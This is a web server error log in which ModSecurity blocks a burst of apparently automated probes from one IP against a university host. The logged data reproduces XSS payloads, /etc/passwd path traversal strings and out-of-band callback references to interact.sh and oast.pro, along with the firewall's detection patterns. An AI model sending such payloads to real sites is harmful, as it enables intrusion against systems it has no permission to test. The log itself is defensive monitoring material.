[Tue Aug 29 11:51:15.874510 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAlUlh4AAAA0"]
[Tue Aug 29 11:51:16.549674 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAnMeokAAAAD"]
[Tue Aug 29 11:51:16.597297 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15RMCo-f0AAAnIlfUAAAAV"]
[Tue Aug 29 11:51:17.598795 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAlIBhEAAAAn"]
[Tue Aug 29 11:51:17.873095 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAmHd@AAAAAz"]
[Tue Aug 29 11:51:20.532447 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAlIBhcAAAAn"]
[Tue Aug 29 11:51:20.703692 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAm@5xYAAAAH"]
[Tue Aug 29 11:51:21.536666 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAnIlf8AAAAV"]
[Tue Aug 29 11:51:21.627856 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAnIlgAAAAAV"]
[Tue Aug 29 11:51:21.644915 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAkr0FMAAAAC"]
[Tue Aug 29 11:51:22.904667 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAm-Mc8AAAAI"]
[Tue Aug 29 11:51:22.985032 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAm-MdAAAAAI"]
[Tue Aug 29 11:51:23.012353 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAmLPSkAAAAN"]
[Tue Aug 29 11:51:23.567580 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAmHd@wAAAAz"]
[Tue Aug 29 11:51:23.781165 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAlUliYAAAA0"]
[Tue Aug 29 11:51:24.903175 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAm80O4AAAAF"]
[Tue Aug 29 11:51:24.906107 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAkwQXUAAAAS"]
[Tue Aug 29 11:51:26.685704 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAkr0F4AAAAC"]
[Tue Aug 29 11:51:26.791995 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAmQ-xkAAAAb"]
[Tue Aug 29 11:51:26.885058 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAmIbQgAAAAo"]
[Tue Aug 29 11:51:27.032344 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAm7m@sAAAAE"]
[Tue Aug 29 11:51:27.600970 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAlIBicAAAAn"]
[Tue Aug 29 11:51:28.865750 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAnDFzIAAAAM"]
[Tue Aug 29 11:51:28.867305 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAm7m-EAAAAE"]
[Tue Aug 29 11:51:28.935847 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAkyyF4AAAAW"]
[Tue Aug 29 11:51:29.594997 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAfWOFYAAAAL"]
[Tue Aug 29 11:51:30.575548 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAnB5V8AAAAJ"]
[Tue Aug 29 11:51:30.612166 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAnGkJQAAAAR"]
[Tue Aug 29 11:51:30.818767 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAmLPT0AAAAN"]
[Tue Aug 29 11:51:31.548219 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAnGkJcAAAAR"]
